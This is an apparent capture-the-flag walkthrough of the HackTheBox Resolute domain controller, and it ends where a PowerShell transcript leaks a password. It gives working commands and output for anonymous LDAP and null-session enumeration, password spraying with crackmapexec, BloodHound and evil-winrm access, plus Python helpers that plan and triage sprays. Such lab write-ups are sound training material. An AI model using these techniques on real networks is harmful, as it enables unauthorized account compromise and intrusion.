HTB Walkthrough (Active Directory 101: Resolute)

news/2025/1/15 21:41:45/

Nmap scan

Command: nmap -A -T4 10.10.10.169
Output:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-16 01:30 EST
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.65% done; ETC: 01:30 (0:00:01 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.32% done; ETC: 01:32 (0:00:00 remaining)
Nmap scan report for 10.10.10.169
Host is up (0.72s latency).
Not shown: 990 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-16 06:38:20Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/16%OT=88%CT=1%CU=30146%PV=Y%DS=2%DC=T%G=Y%TM=63C4EF9
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=
OS:A)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=10B%
OS:TI=I%CI=I%TS=A)OPS(O1=M537NW8ST11%O2=M537NW8ST11%O3=M537NW8NNT11%O4=M537
OS:NW8ST11%O5=M537NW8ST11%O6=M537ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W
OS:5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M537NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=
OS:)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A
OS:=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=
OS:G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h47m02s, deviation: 4h37m11s, median: 7m00s
| smb2-time:
|   date: 2023-01-16T06:39:12
|_  start_date: 2023-01-16T06:36:35
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2023-01-15T22:39:13-08:00

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   294.26 ms 10.10.16.1
2   294.29 ms 10.10.10.169

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.78 seconds

Analysis: the target is a domain controller for megabank.local. Kerberos (88), LDAP (389/636, plus the Global Catalog on 3268/3269), SMB (445) and RPC (135) are all exposed. Port 593 is RPC over HTTP (ncacn_http), the transport that carries DCOM/RPC calls over HTTP, not a separate DCOM service. Two details worth keeping in mind: SMB signing is required, so SMB relay against this host is off the table; and the default scan covers only nmap's top 1000 TCP ports, so WinRM on 5985 (which evil-winrm relies on later) does not appear here and a full -p- scan is worth running. The clock-skew line (median 7 minutes) matters too: Kerberos tolerates 5 minutes of skew, so sync the attacker clock to the DC before any Kerberos-based step.

Enumerate domain users with windapsearch (anonymous LDAP bind)

Because the network was laggy I went through a tunnel on a VPS; under normal conditions these commands do not need proxychains.
Command: proxychains ./windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U
Output:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.169
[+] Getting defaultNamingContext from Root DSE
[proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
[+]     Found: DC=megabank,DC=local
[+] Attempting bind
[proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
[+]     ...success! Binded as:
[+]      None
[+] Enumerating all AD users
[+]     Found 25 users:

cn: Guest

cn: DefaultAccount

cn: Ryan Bertrand
userPrincipalName: ryan@megabank.local

cn: Marko Novak
userPrincipalName: marko@megabank.local

cn: Sunita Rahman
userPrincipalName: sunita@megabank.local

cn: Abigail Jeffers
userPrincipalName: abigail@megabank.local

cn: Marcus Strong
userPrincipalName: marcus@megabank.local

cn: Sally May
userPrincipalName: sally@megabank.local

cn: Fred Carr
userPrincipalName: fred@megabank.local

cn: Angela Perkins
userPrincipalName: angela@megabank.local

cn: Felicia Carter
userPrincipalName: felicia@megabank.local

cn: Gustavo Pallieros
userPrincipalName: gustavo@megabank.local

cn: Ulf Berg
userPrincipalName: ulf@megabank.local

cn: Stevie Gerrard
userPrincipalName: stevie@megabank.local

cn: Claire Norman
userPrincipalName: claire@megabank.local

cn: Paulo Alcobia
userPrincipalName: paulo@megabank.local

cn: Steve Rider
userPrincipalName: steve@megabank.local

cn: Annette Nilsson
userPrincipalName: annette@megabank.local

cn: Annika Larson
userPrincipalName: annika@megabank.local

cn: Per Olsson
userPrincipalName: per@megabank.local

cn: Claude Segal
userPrincipalName: claude@megabank.local

cn: Melanie Purkis
userPrincipalName: melanie@megabank.local

cn: Zach Armstrong
userPrincipalName: zach@megabank.local

cn: Simon Faraday
userPrincipalName: simon@megabank.local

cn: Naoki Yamamoto
userPrincipalName: naoki@megabank.local

[*] Bye!

The anonymous bind succeeds ("Binded as: None"), so the full user list is readable without any credentials. That is the misconfiguration being exploited here: the DC allows anonymous LDAP reads of user objects.

Check account descriptions for passwords with windapsearch

Command: proxychains ./windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U --full | grep Password
Output:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
[proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
description: Account created. Password set to Welcome123!
badPasswordTime: 0
(badPasswordTime: 0 repeated once per user)

Most of the grep hits are the badPasswordTime attribute, but one description attribute contains what looks like a password: Welcome123!. The grep does not tell us which user it belongs to; the rpcclient query below does.

List users and descriptions through an rpcclient null session

This is a second route to the same data. Instead of LDAP on 389, rpcclient talks to the SAMR interface over SMB on 445, and it works here because the DC accepts a null session (no username or password). Null-session enumeration has been restricted by default since Windows XP SP2 and Windows Server 2003; on a modern DC it usually only survives through a misconfiguration, typically "Anonymous Logon" being a member of Pre-Windows 2000 Compatible Access. HTB leaves the null session open, but in real-world HVV (护网) engagements disabled Kerberos pre-authentication and open 445 null sessions are rare: most intrusions go through CVEs, and this kind of misconfiguration is comparatively uncommon.
Command: proxychains rpcclient -U "" -N 10.10.10.169
Output:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
WARNING: no network interfaces found
[proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
rpcclient $>
Command: enumdomusers            # enumerate users
Output:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
Command: querydispinfo           # list users with their descriptions
Output:
rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail        Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator   Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela         Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette        Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika         Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire         Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude         Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount  Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia        Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred           Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest           Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo        Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt          Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus         Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko          Name: Marko Novak    Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie        Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki          Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo          Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per            Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan           Name: Ryan Bertrand  Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally          Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon          Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve          Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie         Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita         Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf            Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach           Name: (null)    Desc: (null)
As with windapsearch, the description field leaks a suspected password, and this time it is tied to an account: marko. Note that SAMR returns 27 accounts where anonymous LDAP returned 25; Administrator and krbtgt were not visible over LDAP, so it is worth running both enumerations.
user:password   marko:Welcome123!

Validate the discovered credential with crackmapexec

Command: proxychains crackmapexec smb 10.10.10.169 -u marko -p 'Welcome123!' --continue-on-success
Output:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Initializing MSSQL protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
[proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
[proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:135  ...  OK
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
[proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:445  ...  OK
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
The password does not work for marko (STATUS_LOGON_FAILURE), so marko has presumably changed it since the account was created. A password from an onboarding template like this is often reused for other new accounts, so the next step is a password spray.

Check the domain lockout policy before spraying, so no accounts get locked

Command: proxychains ldapsearch -H ldap://10.10.10.169 -x -b 'dc=megabank,dc=local' -s sub "*" | grep lock
Output:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  45.63.14.160:8000  ...  10.10.10.169:389  ...  OK
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
lockoutThreshold is 0, so account lockout is disabled and the spray can run freely. The intervals are stored as negative 100-nanosecond ticks, so -18000000000 is 30 minutes. The attributes appear twice because both the domain head and the CN=Builtin container carry them. Caveat: this is only the default domain policy; a fine-grained password policy (a PSO under CN=Password Settings Container,CN=System) can impose a stricter threshold on specific users or groups, and that is not visible from these attributes.
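To make the policy check repeatable, here is an added example (not from the original write-up) that reads the three lockout attributes out of ldapsearch output, converts the negative 100-nanosecond intervals to minutes, and derives how many attempts per account can be made per observation window. The first sample holds the page's own values; the second, stricter policy is hypothetical and only there to exercise the non-zero branch.

```python
"""Turn the lockout attributes returned by ldapsearch into a spray budget.
Added example, not part of the original write-up. LDAP_SAMPLE_RESOLUTE holds
the values the page's query returned; LDAP_SAMPLE_STRICT is hypothetical."""
import re

LDAP_SAMPLE_RESOLUTE = """\
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
"""

# Hypothetical hardened policy: 5 attempts, 30-minute window, 60-minute lockout.
LDAP_SAMPLE_STRICT = """\
lockoutDuration: -36000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 5
"""

ATTR_RE = re.compile(
    r"^(lockoutDuration|lockOutObservationWindow|lockoutThreshold):\s*(-?\d+)\s*$", re.M)


def interval_to_minutes(value):
    """AD stores these intervals as negative counts of 100-nanosecond ticks."""
    return abs(int(value)) / 10_000_000 / 60


def parse_lockout_policy(text):
    """Extract threshold, observation window and lockout duration from ldapsearch output."""
    found = {name: int(value) for name, value in ATTR_RE.findall(text)}
    missing = {"lockoutDuration", "lockOutObservationWindow", "lockoutThreshold"} - found.keys()
    if missing:
        raise ValueError(f"policy attributes not found: {sorted(missing)}")
    return {
        "threshold": found["lockoutThreshold"],
        "window_minutes": interval_to_minutes(found["lockOutObservationWindow"]),
        "duration_minutes": interval_to_minutes(found["lockoutDuration"]),
    }


def spray_budget(policy, reserve=1):
    """Attempts per account per observation window that keep accounts unlocked.
    threshold 0 means lockout is disabled (None = no limit). Otherwise keep
    `reserve` attempts back for the user's own typos and for any fine-grained
    policy (PSO) that this domain-level query cannot see."""
    threshold = policy["threshold"]
    if threshold == 0:
        return {"attempts_per_window": None, "wait_minutes": 0}
    per_window = threshold - reserve if threshold > reserve else 0
    return {"attempts_per_window": per_window, "wait_minutes": policy["window_minutes"]}


if __name__ == "__main__":
    for label, sample in (("resolute", LDAP_SAMPLE_RESOLUTE), ("strict", LDAP_SAMPLE_STRICT)):
        policy = parse_lockout_policy(sample)
        print(label, policy, spray_budget(policy))
```

With the page's values the budget is unlimited; with the hypothetical 5-attempt policy you get 4 passwords per account every 30 minutes, and the lockout counter itself resets after the 60-minute lockoutDuration.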

Spray the password Welcome123!

First save the enumerated usernames to users.txt, then spray with crackmapexec:
Command: proxychains crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success
Output (the repeated [proxychains] chain lines are omitted):
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
Key line: SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!
The spray hits for melanie. (--continue-on-success keeps trying the remaining users after a hit, which is what you want in a spray: more than one account may share the onboarding password.)
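A spray result carries more than [+] and [-]: some NTSTATUS codes are only returned after the DC has accepted the password, and a lockout means the policy check was wrong and the spray must stop. The following added example (not part of the write-up) triages crackmapexec output by status. The sample lines are constructed in the format the page shows; the statuses for paulo, zach and simon are hypothetical.

```python
"""Triage crackmapexec/netexec SMB spray output by NTSTATUS.
Added example, not part of the original write-up. The sample is constructed
in the page's output format; the non-LOGON_FAILURE statuses are hypothetical."""
import re

SPRAY_SAMPLE = """\
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\\marko:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\\melanie:Welcome123!
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\\paulo:Welcome123! STATUS_PASSWORD_MUST_CHANGE
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\\zach:Welcome123! STATUS_ACCOUNT_LOCKED_OUT
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\\simon:Welcome123! STATUS_ACCOUNT_DISABLED
"""

LINE_RE = re.compile(
    r"^SMB\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+\[(?P<mark>[+-])\]\s+"
    r"(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<password>\S+)(?:\s+(?P<status>STATUS_\w+))?")

# Statuses the DC only returns after the password itself was validated:
# the logon is refused for a policy reason, but the credential is right.
PASSWORD_OK_STATUSES = {
    "STATUS_PASSWORD_MUST_CHANGE", "STATUS_PASSWORD_EXPIRED",
    "STATUS_ACCOUNT_RESTRICTION", "STATUS_LOGON_TYPE_NOT_GRANTED",
    "STATUS_INVALID_LOGON_HOURS", "STATUS_INVALID_WORKSTATION",
}
# A lockout means our lockout-policy check missed something (e.g. a PSO): stop spraying.
STOP_STATUSES = {"STATUS_ACCOUNT_LOCKED_OUT"}


def classify(line):
    """Return {user, password, status, verdict} for one result line, or None for banners."""
    m = LINE_RE.match(line)
    if not m:
        return None
    status = m["status"]
    if m["mark"] == "+":
        verdict = "valid"
    elif status in PASSWORD_OK_STATUSES:
        verdict = "password-correct"
    elif status in STOP_STATUSES:
        verdict = "locked-out"
    elif status == "STATUS_ACCOUNT_DISABLED":
        verdict = "disabled"      # inconclusive about the password; skip the account
    else:
        verdict = "failed"
    return {"user": m["user"], "password": m["password"], "status": status, "verdict": verdict}


def triage(output):
    """Group usernames by verdict; a non-empty 'locked-out' bucket should abort further rounds."""
    buckets = {}
    for line in output.splitlines():
        result = classify(line)
        if result:
            buckets.setdefault(result["verdict"], []).append(result["user"])
    return buckets


if __name__ == "__main__":
    for verdict, users in triage(SPRAY_SAMPLE).items():
        print(f"{verdict:17s} {', '.join(users)}")
```

Pipe real crackmapexec output (with proxychains noise filtered out) into triage(); treat "password-correct" hits as credentials to try over other protocols such as LDAP or WinRM, where the SMB-side restriction may not apply.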

Collect and analyse the domain with bloodhound.py

Command: python bloodhound.py -d megabank.local -u melanie -p Welcome123! -c all -ns 10.10.10.169
A note on the setup: at first I ran this through proxychains and the VPS port mapping and the collection failed; running it directly on the VPS worked. (A likely reason is that bloodhound.py resolves names over UDP DNS via the -ns server, which proxychains cannot carry; its --dns-tcp option forces TCP lookups.)
BloodHound analysis: melanie has the CanPSRemote edge to the DC, so she can open a remote PowerShell session there; the next step is an evil-winrm login. BloodHound's own description of CanPSRemote: "The user MELANIE@MEGABANK.LOCAL has the capability to create a PSRemote Connection with the computer RESOLUTE.MEGABANK.LOCAL. PS Session access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system. Note: This edge does not guarantee privileged execution." In practice this edge comes from membership in BUILTIN\Remote Management Users, which is exactly what whoami /groups shows later on.


Log in to the DC with evil-winrm

Command: proxychains evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!

Post-login enumeration on the DC

Enumeration turns up C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt. The PSTranscripts directory is hidden, so it only shows up with dir -Force (Get-ChildItem -Force); a plain dir skips it.
Download the file with Evil-WinRM's download command and read it locally. File contents:
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Key line: + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
